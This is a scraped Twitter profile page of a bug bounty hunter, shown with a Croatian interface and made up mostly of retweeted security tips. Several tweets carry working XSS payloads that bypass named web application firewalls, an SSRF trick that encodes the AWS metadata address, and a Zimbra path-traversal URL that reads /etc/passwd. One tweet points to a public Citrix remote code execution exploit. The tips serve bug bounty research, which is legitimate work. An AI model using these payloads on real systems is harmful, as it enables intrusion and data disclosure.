Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @armaancrockroax
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @armaancrockroax
-
Prikvačeni tweet
I just published Scary Bug in Burp Suite Upstream Proxy Allows Hackers to Hack Hackershttps://link.medium.com/tAYjMDnkFV
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Chrome:<iframe name=windowplz> </iframe> <script> windowplz.alert(1) </script> Based on
@terjanq's DOM Clobbering research.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Armaan Pathan proslijedio/la je Tweet
When testing for SSRF using a black list, take internal IP addresses and when encoding them, dont encode entire IP. Encode 1 octet of the IP address, or 2 or 3. For Instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018)
#bugbountytip#bugbountyPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Why not step into the next decade with WAF bypasses? Here are some gifts.
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
Happy 0x32303230.
#infosec#bugbounty#bugbountytipspic.twitter.com/74KGzwMqME
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it: <style>
@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Off-Facebook activity by Facebook is very insightful and yet scary. I don't use Facebook anymore, but apps on my phone do share everything with Facebook



https://www.facebook.com/off_facebook_activity/activity_list … #PrivacyAware#PrivacyFailHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Armaan Pathan proslijedio/la je Tweet
Had a great time learning from these happy group of hunters. Thanks
@bsidesahmedabad@fransrosen@stokfredrik@niksthehacker@emgeekboy@dipenwadhwa@rup_ki_rani@Paresh_parmar1@jaypatel9717@JayJani007@armaancrockroax@badera_rupunk@IntelSecuritypic.twitter.com/0vcwt1KInL
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
We are planning to do AMA's for Indian bug hunters, what questions would you like us to include in AMA?
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
BTW it's funny how these people are criticizing over releasing the exploit and saying skids will hack organizations now but low key dropping sensitive Netscaler post-exploitation files like ns.conf / session files and stuff. To help whom, the skids? 1/2
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Shout-out to
@ProjectZeroIN for being first to drop a working exploit of CVE-2019-19781https://github.com/projectzeroindia/CVE-2019-19781 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
We just released the exploit for Remote Code Execution on Citrix Application Delivery Controller and Citrix Gateway (CVE-2019-19781)https://github.com/projectzeroindia/CVE-2019-19781 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Have reproduced Citrix SSL VPN pre-auth RCE successfully on both local and remote. Interesting bug!https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
P1 on new year (zimbra LFI) [http://victim.com ]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
#bugbounty#togetherwehitharder#bugbountytips#bugbountytippic.twitter.com/NH7meUlaH0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Time for
#bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results.#bugbountytips#HappyHackingHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
It was great meeting you in person
@_ayoubfathi_@garagosy hope will meet soon again with your another nightmare stories

with @Yassineaboukir




pic.twitter.com/vYqJa2IVdn
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#2020goals - Be a better person - will take care of health - more time to family - bug hunting only in weekends (friday only) - will take a deep dive in python + algorithms and also will learn automation - build at least one burp plugin.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I wont write any numbers that how much I earned and blah blah blah! I will just say, i have achived everything expect getting OSCE certification! #2019 was blast for me. Thanks everyone who has supported me in achieving my goals.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Armaan Pathan proslijedio/la je Tweet
Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.https://leucosite.com/Edge-Chromium-EoP-RCE/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

